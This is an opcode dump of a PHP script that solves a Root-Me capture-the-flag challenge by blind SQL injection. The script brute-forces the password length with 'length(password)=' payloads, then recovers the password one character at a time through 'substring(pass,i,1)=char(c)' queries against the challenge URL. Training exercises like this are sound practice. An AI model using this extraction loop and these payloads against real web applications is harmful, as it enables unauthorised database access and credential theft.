Finding entry points Branch analysis from position: 0 1 jumps found. (Code = 42) Position 1 = 43 Branch analysis from position: 43 2 jumps found. (Code = 44) Position 1 = 45, Position 2 = 9 Branch analysis from position: 45 2 jumps found. (Code = 43) Position 1 = 47, Position 2 = 48 Branch analysis from position: 47 1 jumps found. (Code = 79) Position 1 = -2 Branch analysis from position: 48 1 jumps found. (Code = 42) Position 1 = 103 Branch analysis from position: 103 2 jumps found. (Code = 44) Position 1 = 105, Position 2 = 54 Branch analysis from position: 105 1 jumps found. (Code = 62) Position 1 = -2 Branch analysis from position: 54 2 jumps found. (Code = 43) Position 1 = 57, Position 2 = 58 Branch analysis from position: 57 1 jumps found. (Code = 42) Position 1 = 78 Branch analysis from position: 78 2 jumps found. (Code = 44) Position 1 = 83, Position 2 = 74 Branch analysis from position: 83 2 jumps found. (Code = 43) Position 1 = 88, Position 2 = 102 Branch analysis from position: 88 2 jumps found. (Code = 44) Position 1 = 105, Position 2 = 54 Branch analysis from position: 105 Branch analysis from position: 54 Branch analysis from position: 102 Branch analysis from position: 74 2 jumps found. (Code = 44) Position 1 = 83, Position 2 = 74 Branch analysis from position: 83 Branch analysis from position: 74 Branch analysis from position: 58 Branch analysis from position: 9 1 jumps found. (Code = 42) Position 1 = 26 Branch analysis from position: 26 2 jumps found. (Code = 44) Position 1 = 31, Position 2 = 22 Branch analysis from position: 31 2 jumps found. (Code = 43) Position 1 = 36, Position 2 = 42 Branch analysis from position: 36 1 jumps found. (Code = 42) Position 1 = 45 Branch analysis from position: 45 Branch analysis from position: 42 2 jumps found. (Code = 44) Position 1 = 45, Position 2 = 9 Branch analysis from position: 45 Branch analysis from position: 9 Branch analysis from position: 22 2 jumps found. (Code = 44) Position 1 = 31, Position 2 = 22 Branch analysis from position: 31 Branch analysis from position: 22 filename: /in/UnOHb function name: (null) number of ops: 110 compiled vars: !0 = $url, !1 = $max, !2 = $longueur, !3 = $i, !4 = $fp, !5 = $buf, !6 = $pass, !7 = $borne_inf, !8 = $borne_sup, !9 = $code, !10 = $ligne line #* E I O op fetch ext return operands ------------------------------------------------------------------------------------- 3 0 E > INIT_FCALL 'set_time_limit' 1 SEND_VAL 0 2 DO_ICALL 5 3 ASSIGN !0, 'http%3A%2F%2Fchallenge01.root-me.org%2Fweb-serveur%2Fch10%3Fid%3D1' 7 4 ASSIGN !1, 40 8 5 ASSIGN !2, 0 9 6 ECHO 'Bruteforce+de+la+longueur+du+mot+de+passe+en+cours...%3Cbr+%2F%3E' 10 7 ASSIGN !3, 1 8 > JMP ->43 12 9 > INIT_FCALL 'fopen' 10 INIT_FCALL 'urlencode' 11 NOP 12 FAST_CONCAT ~16 '+and+length%28password%29%3D', !3 13 SEND_VAL ~16 14 DO_ICALL $17 15 CONCAT ~18 !0, $17 16 SEND_VAL ~18 17 SEND_VAL 'r' 18 DO_ICALL $19 19 ASSIGN !4, $19 13 20 ASSIGN !5, '' 15 21 > JMP ->26 17 22 > INIT_FCALL 'fgets' 23 SEND_VAR !4 24 DO_ICALL $22 25 ASSIGN_OP 8 !5, $22 15 26 > INIT_FCALL 'feof' 27 SEND_VAR !4 28 DO_ICALL $24 29 BOOL_NOT ~25 $24 30 > JMPNZ ~25, ->22 20 31 > INIT_FCALL 'preg_match' 32 SEND_VAL '%2Fadmin%2F' 33 SEND_VAR !5 34 DO_ICALL $26 35 > JMPZ $26, ->42 21 36 > ROPE_INIT 3 ~28 'La+longueur+du+pass+est+%3A+' 37 ROPE_ADD 1 ~28 ~28, !3 38 ROPE_END 2 ~27 ~28, '+%3Cbr+%2F%3E' 39 ECHO ~27 22 40 ASSIGN !2, !3 23 41 > JMP ->45 10 42 > PRE_INC !3 43 > IS_SMALLER !3, !1 44 > JMPNZ ~32, ->9 26 45 > IS_EQUAL !2, 0 46 > JMPZ ~33, ->48 47 > > EXIT 'Longueur+non+trouv%C3%A9e' 28 48 > ASSIGN !6, '' 29 49 ASSIGN !3, 1 31 50 ASSIGN !7, 48 32 51 ASSIGN !8, 123 34 52 ASSIGN !9, !7 35 53 > JMP ->103 36 54 > ADD ~39 !8, 1 55 IS_EQUAL !9, ~39 56 > JMPZ ~40, ->58 57 > ASSIGN !9, !7 38 58 > INIT_FCALL 'fopen' 59 INIT_FCALL 'urlencode' 60 ROPE_INIT 5 ~43 '+and+substring%28pass%2C' 61 ROPE_ADD 1 ~43 ~43, !3 62 ROPE_ADD 2 ~43 ~43, '%2C1%29%3Dchar%28' 63 ROPE_ADD 3 ~43 ~43, !9 64 ROPE_END 4 ~42 ~43, '%29' 65 SEND_VAL ~42 66 DO_ICALL $46 67 CONCAT ~47 !0, $46 68 SEND_VAL ~47 69 SEND_VAL 'r' 70 DO_ICALL $48 71 ASSIGN !4, $48 39 72 ASSIGN !10, '' 41 73 > JMP ->78 43 74 > INIT_FCALL 'fgets' 75 SEND_VAR !4 76 DO_ICALL $51 77 ASSIGN_OP 8 !10, $51 41 78 > INIT_FCALL 'feof' 79 SEND_VAR !4 80 DO_ICALL $53 81 BOOL_NOT ~54 $53 82 > JMPNZ ~54, ->74 45 83 > INIT_FCALL 'preg_match' 84 SEND_VAL '%2Fadmin%2F' 85 SEND_VAR !10 86 DO_ICALL $55 87 > JMPZ $55, ->102 47 88 > NOP 89 FAST_CONCAT ~56 !3, '+eme+lettre+trouv%C3%A9e+%3A+' 90 INIT_FCALL 'chr' 91 SEND_VAR !9 92 DO_ICALL $57 93 CONCAT ~58 ~56, $57 94 CONCAT ~59 ~58, '+%3Cbr+%2F%3E' 95 ECHO ~59 48 96 INIT_FCALL 'chr' 97 SEND_VAR !9 98 DO_ICALL $60 99 ASSIGN_OP 8 !6, $60 50 100 PRE_INC !3 51 101 ASSIGN !9, !7 53 102 > PRE_INC !9 35 103 > IS_SMALLER_OR_EQUAL !3, !2 104 > JMPNZ ~65, ->54 55 105 > ROPE_INIT 3 ~67 'Pass+final+%3A+' 106 ROPE_ADD 1 ~67 ~67, !6 107 ROPE_END 2 ~66 ~67, '+%3Cbr+%2F%3E' 108 ECHO ~66 56 109 > RETURN 1
Generated using Vulcan Logic Dumper, using php 8.0.0